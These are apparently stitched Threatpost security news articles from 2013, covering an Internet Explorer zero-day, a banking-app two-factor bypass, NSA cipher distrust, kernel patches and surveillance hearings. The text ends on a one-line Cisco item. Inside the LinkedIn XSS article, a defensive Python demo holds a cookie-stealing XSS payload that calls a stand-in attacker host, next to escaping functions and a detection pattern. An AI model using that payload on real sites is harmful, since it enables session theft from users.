It’s been 14 days since Microsoft issued an advisory and temporary mitigation for a zero-day vulnerability in Internet Explorer, one being actively exploited in the wild and described by some experts as being as severe a browser bug as you can have.
Yet users have since had little more to shield them from these active attacks than a Fix It tool released by Microsoft on Sept. 17. In the meantime, exploits have already taken down a number of Japanese media sites in a watering hole attack targeting government agencies and manufacturers in Japan, and have been implicated in other attacks in Asia going back further than first thought. Microsoft has yet to issue an out-of-band patch for the bug, and with Patch Tuesday a week away, it’s increasingly likely users will continue to be exposed for at least another seven days.
That approach has worked to date because known attacks have been relatively targeted and on a small scale. Yesterday, however, things may have been accelerated with the release of a Metasploit exploit module for CVE-2013-3893. If you’re a believer in HD Moore’s Law, a theory proposed by Josh Corman of Akamai that mirrors Moore’s Law of computing in that casual attacker power grows at the rate of Metasploit, then one could expect an uptick in attacks using this IE bug.
Microsoft did not respond to a request for comment, but last week in response to the attacks against the Japanese media sites, Microsoft said it was continuing to work on developing and testing a security update and urged customers to install the Fix It.
Metasploit engineer Wei Chen wrote in a blog post that while the exploit currently being seen in the wild targets IE 8 on Windows XP and IE 9 on Windows 7, the vulnerability is present in IE all the way back to IE 6, and the Metasploit module could be tweaked for a broader swath of targets.
According to Chen, the IE8 on XP version of the exploit targets only English, Chinese, Japanese and Korean users, unlike the Windows 7 targets.
“Instead, the exploit would try against any Windows 7 machines (IE8/IE9) as long as Office 2007 or Office 2010 is installed,” he said. “This is because the Microsoft Office Help Data Services Module (hxds.dll) can be loaded in IE, and is required to leverage Return-Oriented Programming in order to bypass DEP and ASLR, and gain arbitrary code execution.”
FireEye said infected computers connect to a command and control server in South Korea over port 443; the callback traffic is unencrypted despite its use of port 443, FireEye said, adding that a second sample it collected also connected to the same South Korean IP address. FireEye said it also discovered a handful of malicious domains pointing to that IP in South Korea, which allowed it to make the connection to an attack against security company Bit9 this year. The same email address that registered the South Korean server also registered a domain used in the attack on the security company.
Privat24, the mobile banking application for Ukraine’s largest commercial bank, contains an insufficient validation vulnerability in its iOS, Android, and Windows phone apps that could give an attacker the ability to steal money from user accounts after bypassing its two-factor authentication protection.
The process validation issue arises from a problem in the way PrivatBank has configured the server that handles all of its mobile banking clients. On his website and on the Full Disclosure mailing list, security researcher Eugene Dokukin explains that this vulnerability allowed him to bypass Privat24’s one-time password (OTP) mechanism. However, Dokukin needed to chain a second attack in order to compromise the banking application completely.
Ideally, Privat24 should send an OTP to users via SMS each time they log in. In reality, however, the bank is only sending this code to users when they initially install the application on their Android, iOS, or Windows mobile device. Once the application is installed and verified with the initial OTP on a particular device, users can access the application without overcoming that barrier of entry again. For the PrivatBank website, on the other hand, the bank sends a new OTP each time a user attempts to log in.
PrivatBank protects its users’ accounts with their mobile number – as a username or account number – and a password. So users would need their password to log in with or without the OTP. Dokukin’s attack therefore is a tricky one. An attacker would need a second attack, perhaps using malware or some sort of phishing scheme, to ascertain a user’s account password before being able to compromise the application and potentially steal money.
Dokukin said he contacted PrivatBank and reported the vulnerability to them. They confirmed the problem to Dokukin but have yet to fix it. The researcher has not yet released all of the technical details explaining how this attack works, but says he intends to do so once PrivatBank updates their applications with a patch fixing the bug.
Threatpost reached out to PrivatBank as well, but the company did not respond to a request for comment at the time of publication.
There’s been no shortage of discussion and debate in recent weeks about the possibility that the NSA has intentionally weakened some cryptographic algorithms and cipher suites in order to give it an advantage in its intelligence-gathering operations. If you subscribe to the worst-case scenario line of thinking, then most of the commonly used ciphers are compromised. If you’re more optimistic, then you tend to think that maybe the NSA has some private capabilities against encryption protocols and is exploiting them. However, Jon Callas, co-founder of Silent Circle, which announced Monday that it was moving away from potentially compromised ciphers, said that it really doesn’t matter whether the NSA has done this, because the damage has been done.
“This issue that we’re dealing with now is, can we trust any of this?” Callas said in an interview. “It really boils down to, they’ve said they’ve tried to break things, so have they done that or not? If you’re going to look at it from a realistic point of view, it really doesn’t matter whether they did it. It’s as much about the NSA undermining confidence.”
Silent Circle, a provider of secure messaging systems, made the decision to replace AES and SHA-2 in its products with Twofish and Skein, respectively. AES and SHA-2 both were part of competitions sponsored by the National Institute of Standards and Technology and recent revelations have shown that the NSA may have exerted some influence on the NIST standards process in some cases. It’s not known which protocols may have been affected, and that uncertainty is part of what drove Silent Circle’s decision, as well as the debate in the security community about what actions to take, if any.
Callas, a cryptographer and co-founder of PGP Corp., said that Silent Circle had been thinking about this move for a few weeks before the announcement and that the technical implementation would not be difficult. For companies such as Silent Circle, whose customers depend on the security and confidentiality of the products, the issue comes down to removing doubt from its customers’ minds. But for the rest of the Internet community, there are other issues to consider as they relate to the security of some of the elliptic curves designed by NIST and the NSA.
“The thing that would be the most likely, and in some ways the scariest, is what if the NSA created these curves in good faith and then the mathematicians there found issues with them, that they’re weaker than anybody thought,” Callas said. “There are things that we’ve discovered about elliptic curves in the past. If the NSA knew that these curves were weaker than we thought, does it matter?
“The defense we’ve always had in the past is that the crypto the NSA recommended was the same stuff they used to protect top secret data, so we could always say, Well, would they shoot themselves in the foot, too? Now, it seems perfectly plausible to me that if the intel side of the house found something that gave them an advantage over everybody else, they would keep it from the other side of the house. Now we’re really wondering if maybe they would shoot themselves in the foot on purpose.”
The ciphers that Silent Circle is planning to use in its products were both designed independently, something that Callas believes will be important for the company’s customers going forward.
“There have always been people who haven’t trusted the standard things, and even the NIST people would say, if you don’t trust it, go use these other finalists over here that are intellectual property free,” he said. “That got me thinking. We have to find our way through the legitimate mistrust that starts to resemble a hall of mirrors in a bad 1960s spy movie.”
Debian developers alerted Linux users late last week of a new Linux kernel build, linux-2.6, that fixes 11 separate vulnerabilities that could open the kernel to a denial of service attack, information leak or privilege escalation.
Dann Frazier, an administrator with Debian, announced the security updates via the project’s mailing list late Friday.
The first two Common Vulnerabilities and Exposures identifiers cover information leaks in the kernel that could be exploited on a 64-bit system (CVE-2013-2141) and, while it may sound archaic, through a CD-ROM driver (CVE-2013-2164). According to Jonathan Salwan, a Paris-based Linux researcher, under certain conditions a local user on a system with a malfunctioning CD-ROM drive could gain access to sensitive kernel memory.
Salwan also discovered an additional vulnerability, in the openvz kernel, that local users could exploit to gain access to sensitive kernel memory.
Kees Cook, a member of the Ubuntu security team, discovered four of the 11 vulnerabilities. Two of those can lead to an attacker crashing the system in a denial of service (CVE-2013-2888 and CVE-2013-2892), while the other two are somewhat less serious and affect the block subsystem and the b43 network driver. Those vulnerabilities should really only be of concern to those with specially configured systems.
The remaining fixes address a variety of issues, including memory leaks in the implementation of the PF_KEYv2 socket family and the Linux SCTP protocol.
As usual, Debian, which maintains one of the more popular Linux distributions today, is encouraging users to upgrade to the new linux-2.6 packages and any associated user-mode-linux packages.
Those looking for more information on the vulnerabilities can head to Debian’s security update, DSA-2766-1, from Friday.
Microsoft’s report on compliance with law enforcement requests for data demonstrates a status quo for the software giant from the last reporting period. While the number of requests from law enforcement dropped worldwide in the first six months of 2013, Microsoft complied with 79 percent of requests resulting from court orders, subpoenas and warrants. Only 2.2 percent of those requests resulted in the customer content from services such as Outlook, Hotmail, Xbox Live, or SkyDrive being turned over to the authorities; no Skype requests for user content were made.
Microsoft’s numbers in this report do not take into account national security requests for data; those are handled in a separate report and remain a contentious subject for technology companies. A slew of them, including Microsoft, Google, Facebook, Yahoo and most recently LinkedIn and Dropbox, have petitioned the Foreign Intelligence Surveillance Court (FISC) for permission to publish aggregate numbers on National Security Letter requests for customer data.
In the meantime, Microsoft’s Law Enforcement Requests Report shows that the majority of requests come from authorities in the U.S., United Kingdom, Turkey, Germany and France; Skype-related requests come largely from the U.S., U.K., France and Germany. Microsoft said that no Skype content data was turned over to law enforcement among the 81 percent of Skype requests complied with.
“This new data shows that across our services only a tiny fraction of accounts, less than 0.01 percent, are ever affected by law enforcement requests for customer data,” the report said. “Of the small number that were affected, the overwhelming majority involved the disclosure of non-content data.”
Non-content data, according to the report, includes the user’s name, billing address, IP address history and more. Content data, on the other hand, is defined as the text of an email message, images and files stored in SkyDrive files, calendar information and contact information.
Encompassing all Microsoft services, including Skype, the company received 7,014 law enforcement requests affecting 18,809 accounts; 11 percent of those requests resulted in user content being turned over and 65 percent of non-content data requests were complied with. Of the requests Microsoft did not comply with, either a legal burden was not met, or no customer data was found for the account in question.
As for Skype data alone, 759 requests were made on 1,564 accounts. No content requests were made in relation to Skype, while 790 requests for non-content data were complied with; 80 percent of the requests.
Skype, which was acquired in 2011 by Microsoft, has been a centerpiece of the NSA surveillance scandal since it became public in June. Almost immediately, data leaked by former NSA whistleblower Edward Snowden indicated that not only did the spy agency have pre-encryption access to Outlook and Hotmail data, but it had also collaborated with Microsoft on access to SkyDrive and Skype. According to a report in the Guardian, the NSA boasted of having been able to triple the number of Skype video calls captured in the Prism program.
Microsoft has denied these accusations and along with other massive tech companies has petitioned the FISA court for the ability to enhance its reporting on requests from the government related to national security. To date, companies are allowed to publish NSL request data in bundles of 1,000; Microsoft reported 0-999 for 2012 and between 1,000 and 1,999 the year before.
Smaller companies such as LinkedIn and Dropbox argue that level of reporting decreases transparency and could indicate that those companies could be bigger national security targets for data requests than they are.
The state of embedded device security is poor, and there hasn’t been much in the way of discussion to the contrary. It’s well established that vendors skimp on security, selling, for example, routers and other networking gear protected only by default passwords, or other critical devices engineered to be accessible with a simple telnet command. These practices pose an enormous risk to the infrastructure supporting those devices, leaving them open to attack by hackers. Those vulnerabilities can lead to data loss, network performance degradation, or worse, put lives in danger if critical services such as water or power are impacted.
For Metasploit creator HD Moore, this was a call to action. Moore has invested serious time into examining data from previous scans of the IPv4 address space, looking for equipment exposed by shoddy default configurations and other vulnerabilities. His own Critical.io project, along with the Internet Census 2012, the Carna botnet and a host of academic and research tools that scan the Internet and return bulk data on device exposures, has done plenty to shine a harsh light on the risks posed by these Web-facing devices.
But Moore believes there is plenty of room for additional analysis. He’s advanced his work by collaborating with a team of researchers at the University of Michigan on Project Sonar, a repository of scan data that has been responsibly collected by the researcher community. Moore said he hopes to engage the security community into not only analyzing the data produced by scans of public-facing networks, but also contributing data sets. Project Sonar is being hosted by the University of Michigan at scans.io.
“We need more eyes on it because we need the shame to fall on these vendors for the terrible products they’re producing,” Moore said, adding as an example, that he’s found upwards of 10,000 command shells sitting online accessible via telnet that would give an outsider root access to the device in question. “The fact that we’ve got issues like that where there’s not even a pretense of security, yet these devices are not getting any better and in some cases we’re seeing an expansion of the vulnerable devices year over year, that was a call to action to me to make it harder for vendors to avoid the scrutiny they deserve.
“The thing is a lot of people like to see results and like to see the tiny pictures, but not many people want to dig into and pull stuff out,” Moore said. “We’re going to try to do that, make it palatable for amateur researchers and everyday IT admins to use as a resource.”
Currently, there are five data sets hosted by Project Sonar, formally known as the Internet-Wide Scan Data Repository; the two teams used a host of tools to collect the data including ZMap, an Internet scanner developed at UM, UDPBlast, Nmap, and MASSCAN among others. Two datasets were contributed by the University of Michigan and those include scans of HTTPS traffic looking for raw X.509 certificates (43 million have been included from 108 million hosts) as well as data from an IPv4 scan on port 443 conducted last October to measure the impact of Hurricane Sandy. Rapid7 has also contributed three data sets: service fingerprints from Moore’s Critical.IO project; a scan of IPv4 SSL services on port 443; and a regular DNS lookup for all IPv4 PTR records.
“After going through the data enough times, it became obvious there are so many different vulnerabilities and issues that really just take some human eyes on things,” Moore said. “It really doesn’t make sense to sit on this amount of data and not share it.”
Researchers and IT managers can use the data in a variety of ways: in bulk, researchers could generate vulnerability data per vendor or per product, or, on a narrower scope, the data can be used for asset inventory, for example on a particular IP range, in order to identify existing vulnerabilities. A Rapid7 team used the data, for example, to accelerate a penetration test on an 80,000-node network. Moore said an entire asset inventory was done in about 20 minutes, as opposed to three days with customary tools and scans.
Early feedback has been positive, and Moore said some researchers have already begun to build Web services and queries around the data. Moore added that UM and Rapid7 hope that additional datasets will eventually be contributed, so long as the collection efforts are done legally and within ethical bounds. It’s for that reason, Moore said, that neither UM nor Rapid7 will host data collected from the Internet Census or Carna botnet for this project, the legality of which is still in question.
“Right now we’re steering away from offering any kind of Web service; I don’t want to have a service where folks are depending on me to get them results, nor do I want to be responsible for seeing what queries they run,” Moore said. “It’s not what we’re trying to solve. We’re taking the bulk data that’s multiple gigabytes, 5-6 terabytes, and make that available on the website in bulk form for anyone who’s doing research to download it. At the same time, we’re taking different slices of the data as well and saying ‘Let’s just take the name fields for this packet,’ or parse out a particular field and make those available for folks who are doing more casual testing.”
I had a chance to visit a number of industrial events this year and can see the evolution of cybersecurity in the industrial field. One of these was the 4th National Institute of Standards and Technology (NIST) Cybersecurity Framework Workshop (CFW). Kaspersky was in attendance at the previous events, but the main difference with this one was that now we had sponsors.
The 4th Workshop was another round to gather feedback on the latest version of the cybersecurity framework published on August 28, 2013. My takeaways from this workshop include (well, not too far from the previous 3rd workshop):
- The Cybersecurity Framework is not about “how,” it’s about “what”
- The CFW is more of a marketing push for newbies and a refresher for pros
- There is a huge demand for industrial people to decide on how.
- Whitelisting and Default Deny are a must
Overall, the resulting framework is not specific enough for any of the Government-specified 17 Critical Infrastructure Sectors, to understand the practical steps of implementing a cybersecurity strategy or to at least understand the practical set of instruments (aka security controls).
For those who are not familiar, the Framework consists of five functions, categories for each of those functions, subcategories for each category; and separately, security profiles and maturity tiers.
Functions describe, in general, what your cybersecurity should consist of: Identify, Prevent, Detect, Respond and Recover. Most people agree on these functions, while some argue that Improve/Update should be explicitly added in the security domain. As opposed to many other frameworks, security becomes obsolete faster: while you may be secure today, in 12 months that may no longer be the case because of new attack methods.
The Categories included in the Framework are comprehensive as well. But, unfortunately, the subcategories (please find the full list in the document itself, see page 14) are a mix of abstract categories, which help to see the domain and potential goals but leave the selection of methods to the reader, and technical security controls that many sectors find inapplicable or incomplete. So it’s unsurprising that for the second Workshop in a row we see the same story: whenever any of the workgroups starts speaking about subcategories, the work stalls. Most of the participants failed to examine the entire list, and besides, representatives of different sectors are unsatisfied with the way subcategories are set at all – each for their own reasons.
Overall, the subcategories decided upon can be considered quite a failure. For example, the only control related to Industrial Control Systems simply says, “PR.PT-5: Manage risk to specialized systems, including operational technology (e.g., ICS, SCADA, DCS, and PLC) consistent with risk analysis”. It’s very specific, and helpful for OT people, if you know what I mean.
Apparently, it’s rather hard to have “Security Controls” done in a universal way for different sectors – including IT and industrial systems – and this doesn’t even take into account smaller sectors. For example, financial sectors are normally believed to take care of data quite well, but the example of Treasury was quite illustrative – all data is public, so confidentiality isn’t a major concern, but transaction and data integrity of shares in people’s possession is a must. This is similar to the situation for industrial control systems.
My impression is that NIST has decided to leave the work on defining the exact set of subcategories and controls to individual critical infrastructure sectors.
However, this method is not good for certain sectors depending on the industrial network, as there are 9 sectors where industrial systems prevail, but the regulators and industry associations are different – DoE, DoT. So it is unclear whether each sector has to do the “instantiation” of the framework on its own, and whether or not this should be repeated nine times with different results, as they share many commonalities due to their reliance on Industrial Control Systems.
Also, NIST will leave the Framework implementation details to each sector. One of the questions that wasn’t answered at the workshop was, “How do you implement security along this framework, or at least, what will you start with?”
One option is to remove subcategories from the framework, to make it consistent, and to try not to present universal security controls, but rather make the Categories a goal-setting framework.
The Framework also includes another dimension – Profiles (what does your organization need among the variety of categories and controls – what are your security priorities, based on the business specifics), and Tiers (how mature are you in cybersecurity). While it seems to be common sense, all of the frameworks in different domains basically share the same approach on “Flexibility” and “Maturity”. However in practice, in CFW it’s rather a mess because it is unclear how to measure what Tier you have and in turn what that tier stands for.
So what’s the good news?
- NIST adopted Kaspersky Lab’s whitelisting (Default Deny) approach for security for Critical Infrastructures – namely, “PR.PT-3: Implement and maintain technology that enforces policies to employ a deny-all, permit-by-exception policy to allow the execution of authorized software programs on organizational systems (aka whitelisting of applications and network traffic)”. We believe that this totally makes sense, and we are happy to know that our voice has been heard and our vision shared.
- A major goal and major impact of the Cyber Security Framework is marketing – pushing all Critical Infrastructures, including many of those who do not yet have any cyber security programs, to start doing something, and providing more of a budget to CISOs of those who have a clear vision already. Many people suggested putting a framework in a marketing brochure to make it clear.
- The third positive as a result of this workshop, is that once pushed widely, the Framework can help people from different companies. Helping companies better understand each other in the cybersecurity domain is important, as most critical infrastructures are interconnected and outsourcing to each other, which can bring a serious domino effect in a potential cyber security incident. Cybersecurity marketing efforts could be helpful in many countries for the sake of cybersecurity of Critical Infrastructures.
- Fourth, sector-specific jobs on specifying the security controls and mapping the Framework to existing sector and industry standards will be done, though that person or group has not been identified. The cyberframework could become a cross-reference between different sector’s standards and frameworks, which will also help build better understanding between entities on the technical level.
While the Cybersecurity Framework may serve as the first step in pushing Critical Infrastructure security, the only way to actually increase protection is to make sure it goes with step two (where do I start?) and step three (what are the best practices to follow?) for each of the Critical Infrastructure sectors. Among these sectors, there are 10 industrial-centric ones that are less-experienced in IT security overall and have a different nature to their processes (high-availability instead of high-confidentiality).
So, the question still remains – how can we make industrial security more practical for the current threat landscape?
Kaspersky Lab is actively exploring possible options with our industrial partners.
The first major domino to fall in the crypto world after the NSA leaks by Edward Snowden began was the decision by Lavabit, a secure email provider, to shut down in August rather than comply with a government order. Shortly thereafter, Silent Circle, another provider of secure email and other services, said it was discontinuing its Silent Mail offering, as well. Now, Silent Circle is going a step further, saying that it plans to replace the NIST-related cipher suites in its products with independently designed ones, not because the company distrusts NIST, but because its executives are worried about the NSA’s influence on NIST’s development of ciphers in the last couple of decades.
Jon Callas, one of the founders of Silent Circle and a respected cryptographer, said Monday that the company has been watching all of the developments and revelations coming out of the NSA leaks and has come to the decision that it’s in the best interest of the company and its customers to replace the AES cipher and the SHA-2 hash function and give customers other options. Those options, Callas said, will include non-NIST ciphers such as Twofish and Skein.
“At Silent Circle, we’ve been deciding what to do about the whole grand issue of whether the NSA has been subverting security. Despite all the fun that blogging about this has been, actions speak louder than words. Phil [Zimmermann], Mike [Janke], and I have discussed this and we feel we must do something. That something is that in the relatively near future, we will implement a non-NIST cipher suite,” Callas wrote in a blog post explaining the decision.
Twofish is a cipher suite written by Bruce Schneier, and it was one of the finalists in the AES competition, but lost out to the Rijndael algorithm. It has been resistant to cryptanalysis thus far, and Callas said it also has the advantage of being an easy replacement for AES in Silent Circle’s products. The company also will be replacing SHA-2, an older NIST hash function, with Skein, which was a finalist in the recently completed SHA-3 competition.
“We are going to replace our use of the AES cipher with the Twofish cipher, as it is a drop-in replacement. We are going to replace our use of the SHA–2 hash functions with the Skein hash function. We are also examining using the Threefish cipher where that makes sense. (Full disclosure: I’m a co-author of Skein and Threefish.) Threefish is the heart of Skein, and is a tweakable, wide-block cipher. There are a lot of cool things you can do with it, but that requires some rethinking of protocols,” Callas said.
The decision by Silent Circle comes at a time when there are many unanswered questions about the NSA‘s influence on cryptographic algorithm development, specifically those standards developed by NIST. The National Institute of Standards and Technology is responsible for developing technical standards for the U.S. federal government, and many of those standards, crypto standards in particular, are adopted by other organizations. Recent revelations from the NSA leaks have shown that the NSA has some unspecified capabilities against certain crypto algorithms and also has been working to influence NIST standards development. In response to one of these revelations, NIST itself has advised people to stop using the Dual_EC_DRBG random number generator developed under its supervision.
“The DUAL_EC_DRBG discussion has been comic. The major discussion has been whether this was evil or merely stupid, and arguing the side of evil has even meant admitting it is technologically a stupid algorithm, which sends the discussion into an amusing spiral of meta-commentary,” Callas said.
Silent Circle’s move away from AES and SHA-2 shouldn’t be seen as an indictment of those two ciphers, Callas said, but more of an indication that there are better options out there without the shadow of potential NSA influence hanging over them.
“This doesn’t mean we think that AES is insecure, or SHA–2 is insecure, or even that P–384 is insecure. It doesn’t mean we think less of our friends at NIST, whom we have the utmost respect for; they are victims of the NSA’s perfidy, along with the rest of the free world. For us, the spell is broken. We’re just moving on. No kiss, no tears, no farewell souvenirs,” he said.
Mike Mimoso and Dennis Fisher look back at the news of the last couple of weeks, including some new NSA PR efforts and the Icefog cyberespionage campaign.
http://threatpost.com/files/2013/09/digital_underground_127.mp3
When things go badly in Washington, D.C., when a scandal breaks or damaging leaks begin to surface, there is an established and well-worn playbook that politicians and executives can turn to for solace. There’s a page for every conceivable situation, and it’s that playbook that the National Security Agency and its director, Gen. Keith Alexander, are relying on now as they struggle to win back a bit of the public and political support they’ve lost and keep their tenuous grasp on the collection tools they’ve been employing for more than a decade.
Alexander, who is not just the director of NSA and commander of U.S. Cyber Command but the public face of the agency and its recent troubles, has been making the rounds in the last few days, speaking at security conferences and appearing before Congressional committees. And the message he is delivering is the same in each case: the NSA does not spy on Americans and is, in fact, one of the main reasons that there haven’t been any major terror attacks since 9/11. The agency, he said, looked at the intelligence community’s failures in the months leading up to 9/11 and knew that it needed better tools and more visibility into electronic communications in order to “connect the dots”.
Hence, Section 702 of the FISA Amendments Act and the metadata collection authorized under Section 215 of the USA PATRIOT Act. Those tools, Alexander said, are vital to preventing future terror attacks.
“What we were blamed for as an intelligence community is not connecting the dots. So we came up with a couple of programs. FISA is the key to connecting the dots,” Alexander said in a speech at the Billington Cybersecurity Summit on Wednesday.
He repeated much the same sentiments Thursday in a hearing of the Senate Intelligence Committee, defending the use of FISA Section 215 data collection and repeating, as he has many times since the Edward Snowden leaks began, that the program has helped prevent several terror attacks.
By shifting the focus away from the NSA’s potential abuses of the surveillance programs and the question of whether the bulk collection of phone and Internet data is even necessary, Alexander is employing the time-honored strategy of answering the question he wanted to be asked rather than the one that was posed. He is changing the narrative.
No one disputes that the NSA, CIA, FBI and other agencies are working hard to defend the country and disrupt terrorism. That’s their job, and they’re good at it. Those agencies need tools to do the job, but the thing about tools is that each one is designed for a specific purpose. Start using one for a different job, and it’s not as effective, or worse, someone gets hurt. The old saying is that when all you have is a hammer, everything looks like a nail. That bit of wisdom isn’t limited to hand tools.
The tools that Congress has given the NSA–metadata collection and large-scale Internet traffic collection among them–are meant to do one thing and that’s identify potential terrorist and criminal plots. Alexander and others have said that these programs have been highly effective at doing that. And perhaps they have; the public will never know that. Much like security, intelligence work has the built-in disadvantage of people only finding out about your failures and not your successes. But that’s not really the point, is it? Hammers are great for driving nails, but they can be used to break windows, too.
Some members of Congress have heard the reasoning from Alexander and others for years and have resisted their efforts to change the narrative.
“You built an intelligence collection system that deceived the American people repeatedly. Time after time, the American people were told one thing about domestic surveillance in public forums while government agencies did something else,” Sen. Ron Wyden of Oregon said during the Intelligence Committee hearing yesterday. “That’s a loss of trust that cannot be rebuilt.”
For most of its history, the NSA hasn’t had to worry about what the public thinks. It has answered only to Congress and the president. That’s all changed now, something that Alexander knows quite well. So he has turned his sights on the media and the lawmakers who are asking pointed questions in an effort to move the spotlight away from his agency. But the spotlight is widening with each new revelation and the room for maneuvering is shrinking with each passing day.
The professional social networking service LinkedIn was susceptible to four reflected cross-site scripting (XSS) vulnerabilities before fixing the flaws over the summer.
XSS vulnerabilities are among the most prevalent bugs online. In this case an attacker could potentially exploit LinkedIn users by injecting HTML or script code that executes in their browsers in order to steal the users’ cookies, according to a posting on the Full Disclosure mailing list.
After successfully exploiting the issue, an attacker could then send phishing emails drawing unsuspecting users to a clone site to infect the victim’s machine with malware or steal that user’s login credentials.
The first vulnerability is exploitable by writing maliciously crafted HTML into the “Share an update…” field on the LinkedIn home page. The second and third XSS bugs can be similarly triggered by visiting the “Groups you may be interested in” section of the “Groups” page. Once there, an attacker would need to find an open group and begin a discussion by inserting more specially crafted code into the field on that page before sharing the discussion. The final vulnerability exists on the “group” page as well. However, this one is exploitable by creating a group, then creating a poll within that group and inserting malicious code into the poll creation field.
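The bug class described above is user-supplied text echoed into a page without output encoding. The following is an added example, not code from the Full Disclosure advisory or from LinkedIn: a vulnerable render function beside a hardened one, plus an attribute-context renderer, since entity escaping alone is not enough for a link target. The payload, the wrapper markup and the attacker host name are constructed for the demo.

```python
import html
import re
from urllib.parse import quote

# Constructed payload of the kind described above: markup typed into a
# "Share an update" style field that the site later echoes back to browsers.
# The attacker host is a placeholder, not anything from the advisory.
PAYLOAD = ("<img src=x onerror=\"document.location='http://attacker.example/?c='"
           "+document.cookie\">")

# Hypothetical wrapper markup; stands in for whatever template the site uses.
WRAPPER = '<div class="update">{}</div>'


def render_update_vulnerable(update_text: str) -> str:
    """The bug class in the text: user input concatenated straight into HTML."""
    return WRAPPER.format(update_text)


def render_update_safe(update_text: str) -> str:
    """Encode for HTML element content, so the markup is displayed, not parsed."""
    return WRAPPER.format(html.escape(update_text, quote=True))


def render_link_safe(label: str, url: str) -> str:
    """Attribute context needs more than entity escaping: reject non-http(s)
    schemes (javascript:, data:), percent-encode the URL, then entity-encode it."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"
    encoded = html.escape(quote(url, safe=":/?&=#%"), quote=True)
    return '<a href="{}">{}</a>'.format(encoded, html.escape(label, quote=True))


# A script-bearing tag, or an inline on*= handler inside a real (unescaped) tag.
_ACTIVE = re.compile(r"<\s*(script|iframe|object|embed)\b|<[^>]*\bon\w+\s*=", re.I)


def contains_active_markup(rendered: str) -> bool:
    """Demo check: does the rendered HTML still carry executable markup?
    Escaped input shows up as &lt;img ... and is not matched."""
    return _ACTIVE.search(rendered) is not None


if __name__ == "__main__":
    print(render_update_vulnerable(PAYLOAD))
    print(render_update_safe(PAYLOAD))
    print(render_link_safe("profile", "javascript:alert(document.cookie)"))
```

The check function is only a demonstration aid; in a real application the defense is the encoding at every output point (and a restrictive Content-Security-Policy as a second layer), not a detector run over rendered pages.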
Eduardo Garcia Melia of ISecAuditors uncovered the flaws in December 2012. According to Full Disclosure, LinkedIn fixed the problems sometime in July 2013, and Melia submitted the vulnerability report to Full Disclosure yesterday.
Threatpost reached out to LinkedIn to confirm that the company’s security team had indeed resolved the vulnerabilities but they were not readily available for comment at the time of publication.
LinkedIn touts itself as the world’s largest professional network, boasting more than 238 million users globally.
The professional network made a splash earlier this month with an appeal to the Foreign Intelligence Surveillance Court, the secretive court responsible for regulating much of the National Security Agency’s spying efforts, asking that it be permitted to publish data on the number of National Security Letters it receives.
Did we hear the next shoe to drop in the NSA surveillance saga?
Yesterday before a hearing of the Senate Intelligence Committee, Sen. Ron Wyden, D-Oregon, asked some pointed questions of NSA director Gen. Keith Alexander regarding whether the agency collects cell tower location data in addition to metadata from cell phone calls. That information, used by law enforcement in investigations with a warrant, would help the U.S. spy agency pinpoint the physical location of subjects of investigations.
Alexander moved around what sounded like a rhetorical question from the senator, with a stock answer that a Foreign Intelligence Surveillance Court order would be required if the government wished to seek cell site information as part of the bulk collection of cellphone records.
“What I don’t want to do is put out in unclassified form anything that’s classified,” Alexander said.
With the promise of additional leaks coming from the cache of documents stolen by former NSA contractor Edward Snowden, was Sen. Wyden trying to head the next disclosure off at the pass?
Wyden was animated in grilling Alexander yesterday. He prefaced his questions about the collection of cell site data with a monologue scolding the NSA and the intelligence community for not being up front about surveillance from the outset.
“You built an intelligence collection system that deceived the American people repeatedly. Time after time, the American people were told one thing about domestic surveillance in public forums while government agencies did something else,” Wyden said. “That’s a loss of trust that cannot be rebuilt.”
The Senate Intelligence Committee has oversight over federal intelligence activities, and a good number of the members lobbied to maintain the NSA’s ability to keep surveillance activities alive in the name of national security and foiling terrorist activities. While the arguments for and against stayed true to party lines for the most part, it was mostly friendly fire for Alexander and Director of National Intelligence James Clapper.
Sen. Dan Coats, R-Indiana, admonished the media for how it has reported the scandal, calling it “disturbing” that despite the declassified information provided in public forums, analysis by the media has not always been accurate, in his opinion.
“We’ve been frustrated on countering the popular narrative,” Clapper said. “We’ve done some risk management by opening as much as we can, recognizing the importance for transparency and the importance of regaining the trust of the American people.”
That transparency, Clapper said, also benefits America’s adversaries.
“They go to school on that too,” Clapper said. “Fundamentally, if we don’t have the trust and confidence of the American people, then all of that is for naught. We have tried to err on the side of transparency and openness, but there are risks here.”
Alexander, who spoke earlier this week at the Billington Cybersecurity Summit in Washington, invoked the September 11 attacks on a number of occasions, and reiterated that had the intelligence community not been able to collect bulk cellphone records through Section 215 of the PATRIOT Act, America would have suffered additional terrorist attacks since.
“The American people don’t have a forum where we can have a classified discussion. We can’t reveal information we have,” Alexander said. “We have a process set up to bring information to Congress and the courts and share that with the FBI and go after bad people who intend to do us harm. I’d much rather sit here today defend what we’re doing than be here telling you why we failed to connect the dots again.”
In the meantime, Wyden and Colorado Democrat Sen. Mark Udall pushed a bill before the legislature called the Intelligence Oversight and Surveillance Reform Act, which would reform surveillance activities and prohibit bulk collection of cell data. This runs in parallel with another bill proposed by Senate Intelligence Committee chair Sen. Dianne Feinstein, D-Calif., and Sen. Saxby Chambliss, R-Ga., that would propose reforms yet preserve the NSA’s ability to collect phone records on foreign targets and Americans.
“There is growing, bipartisan sentiment in Colorado and across the country that the way the NSA and our intelligence agencies are balancing Americans’ privacy rights and our security is fundamentally out of whack. We need to end the NSA’s collection of millions of innocent Americans’ private phone records and focus on the real problem: terrorists and spies,” Udall said in a press release announcing the bill. ”These aren’t vague or abstract threats to our liberty. These dragnet searches are happening right now. I am proud to lead this bipartisan push to protect Americans’ privacy rights and ensure that our pursuit of security does not trample our constitutional liberties.”
Wyden’s bill would create an independent advocate who would argue against the government in the secret Foreign Intelligence Surveillance Court; the government is generally the only one arguing before the court, Wyden’s bill says. The act would also prohibit the intelligence community from conducting warrantless searches for cell and email data on Americans.
Feinstein, meanwhile, said domestic collection of metadata does not equal surveillance and argued the NSA’s activities were lawful. Her bill is an attempt to enhance public perception of the NSA’s program. It would require the NSA to publicly report how often it accesses its database of call metadata and shorten how long that data is stored. Feinstein said her bill would also put the NSA director before the Senate for confirmation.
For the time being, the NSA’s bulk collection continues unabated and more Snowden leaks are expected. Alexander told the committee, when asked, that there is no upper limit on the number of records the NSA may collect and that the American people should trust the oversight and compliance requirements NSA analysts must abide by in order to access and investigate data that’s collected.
“I believe it is in the nation’s best interests to put all phone records into a lockbox so that we can search it when needed, yes,” Alexander said.
Image courtesy Razor512 Flickr stream
Networking company Cisco this week is warning customers and those running its software of eight separate vulnerabilities it has patched in its Internetwork Operating System (IOS), the software that runs most of its routers and switches.
